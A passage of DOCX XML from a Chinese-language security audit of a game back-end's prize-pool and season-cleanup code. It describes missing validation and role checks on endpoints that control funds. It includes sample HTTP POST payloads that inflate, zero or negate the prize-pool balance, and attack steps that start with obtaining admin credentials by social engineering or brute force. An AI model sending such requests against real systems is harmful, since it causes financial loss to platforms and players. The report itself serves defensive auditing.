          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>任何已登录的后台账号均可调用，未见角色粒度鉴权（无 `@PreAuthorize` 或权限注解）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="841"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">请求体 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PrizePoolConfigSaveRequest.currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>BigDecimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 类型）完全由请求方控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="842"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>saveConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在无任何数值校验的情况下，将该值通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>c.setCurrentTotalAmount(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 直接写入数据库持久化对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">写入后，下游所有读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的奖励分发逻辑均将基于被篡改的值执行</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入口：PrizePoolManageController.java</w:t>
              <w:br/>
              <w:t>// PrizePoolConfigSaveRequest 关键字段（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   String initialAmount;         ← 字符串类型，无数值校验</w:t>
              <w:br/>
              <w:t>//   BigDecimal seasonBaseAmount;</w:t>
              <w:br/>
              <w:t>//   BigDecimal currentTotalAmount;  ← ⚠️ 运行时金融状态字段，攻击者完全可控</w:t>
              <w:br/>
              <w:br/>
              <w:t>@PostMapping("/config/save")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;PrizePoolConfig&gt; saveConfig(@RequestBody PrizePoolConfigSaveRequest req) {  // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(prizePoolManageService.saveConfig(req));  // ← 污点无过滤传入 service 层</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：PrizePoolManageService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public PrizePoolConfig saveConfig(PrizePoolConfigSaveRequest req) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PrizePoolConfig c = getOrCreateConfig();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getInitialAmount() != null) c.setInitialAmount(req.getInitialAmount());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getSeasonBaseAmount() != null) c.setSeasonBaseAmount(req.getSeasonBaseAmount());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getEnableLevel50Threshold() != null) c.setEnableLevel50Threshold(req.getEnableLevel50Threshold());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getTopCountShare() != null) c.setTopCountShare(req.getTopCountShare());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getRound3TopPercent() != null) c.setRound3TopPercent(req.getRound3TopPercent());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getEnableRound3Share() != null) c.setEnableRound3Share(req.getEnableRound3Share());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getCurrentTotalAmount() != null) c.setCurrentTotalAmount(req.getCurrentTotalAmount());  // ← 漏洞点：运行时金融状态无校验直接覆盖写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return prizePoolConfigRepository.save(c);  // ← 篡改值持久化到数据库</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ getOrCreateConfig 初始化逻辑（佐证 currentTotalAmount 为运行时累计值而非配置项）：</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>public PrizePoolConfig getOrCreateC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>onfig() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return prizePoolConfigRepository.findAll().stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findFirst()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseGet(() -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                PrizePoolConfig c = new PrizePoolConfig();</w:t>
              <w:br/>
              <w:t xml:space="preserve">                c.setCurrentTotalAmount(BigDecimal.ZERO);  // ← 设计意图：初始为0，由游戏逻辑自动累积，不应对外暴露写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">                return prizePoolConfigRepository.save(c);</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场景一：奖池金额虚增（触发超额奖励分发）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/prizePoolManage/config/save HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;admin_token&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "currentTotalAmount": 99999999.00</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场景二：奖池金额清零（阻断合法用户领奖）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/prizePoolManage/config/save HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;admin_token&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "currentTotalAmount": 0</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场景三：奖池金额设为负值（系统金融状态异常）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/prizePoolManage/config/save HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;admin_token&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "currentTotalAmount": -1</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844"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者取得任意后台管理员账号凭证（通过社工、弱口令爆破或账号共享等方式）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">携带管理员 Bearer Token，向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /prizePoolManage/config/save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发送上述 JSON 请求体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="846"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>场景一（超额奖励）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为极大值，系统奖励分发逻辑读取到虚假的高余额，向玩家分发超出实际资金池的奖励，造成平台实际资金损失</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="847"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>场景二/三（拒绝服务）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 清零或置负，导致奖池显示为空或异常，合法玩家无法正常领取已赚取的奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="848"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>上述操作在调用链中不产生任何校验失败，数据直接落库，无审计告警</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：奖池金融状态被任意篡改，下游奖励分发业务基于错误金额执行，导致实际资金与账面记录严重不符。</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849"/>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，需要已认证的管理员 Bearer Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="850"/>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任意已登录的后台账号均可触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，SecurityConfig 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/prizePoolManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仅校验 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.authenticated()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，未配置角色粒度鉴权（代码中无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@PreAuthorize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@ss.hasPermi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等），意味着低权限运营账号与超级管理员拥有同等能力来直接覆盖奖池金融状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>💰 资金影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="851"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者可将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为任意正值，诱使系统超额分发奖励，平台承受实际资金损失（损失上限取决于下游奖励分发逻辑如何消费该字段）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="852"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>亦可清零/置负，冻结合法用户奖励领取权益，引发用户纠纷和声誉损失</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853"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PrizePoolManageController.java.saveConfig → PrizePoolManageService.java.saveConfig → PrizePoolManageService.java.getOrCreateConfig</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audit_m171_621_saveConfig_ctrl-path1of2.md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：SeasonBackupManageService.java#deleteSeasonData</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_39" w:id="39"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞38：赛季数据清理接口无状态预检即批量删除提现记录并归零余额，可致资金状态永久不可恢复</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="85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：全量赛季清理操作缺少在途提现状态预检，可致用户资金永久丢失</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="85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src/main/java/com/gameBack/mjservice/service/SeasonBackupManageService.java:deleteSeasonData</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="85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业务逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="85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5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：超级管理员</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Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>deleteSeasonData()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在同一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 事务中，无条件地：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="859"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>withdrawApplyRecordRepository.deleteAllInBatch()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>全部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>提现申请记录，不区分 PENDING / PROCESSING / COMPLETED / FAILED 状态；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userAccountRepository.updateAllAndSetBalanceZero()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.updateAllAndSetBalanceZero()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户余额强制归零；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="861"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userDepositRecordRepository.deleteAllInBatch()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>充值历史，彻底销毁资金审计链路。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">当系统中存在处于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PENDING / PROCESSING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 状态的提现单（用户资金已从账户扣减、区块链交易已广播但尚未最终确认）时，触发本接口将造成：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场景</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链上交易最终成功</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用户收到外部链上资产，但系统余额为 0、提现记录已删除，账实永久不符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链上交易最终失败/超时</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用户既未收到链上资产，系统余额也为 0，无提现记录可触发退款，资金永久消失</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充值记录删除</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全部入金历史被抹除，无法对账、无法追溯欺诈行为</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">代码中没有任何前置查询来检查是否存在未结算的在途记录（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>count where status in ('PENDING','PROCESSING') &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 则拒绝执行），整个操作"无安全网"地在毫秒级完成。</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/seasonBackupManage/deleteSeasonData</w:t>
              <w:br/>
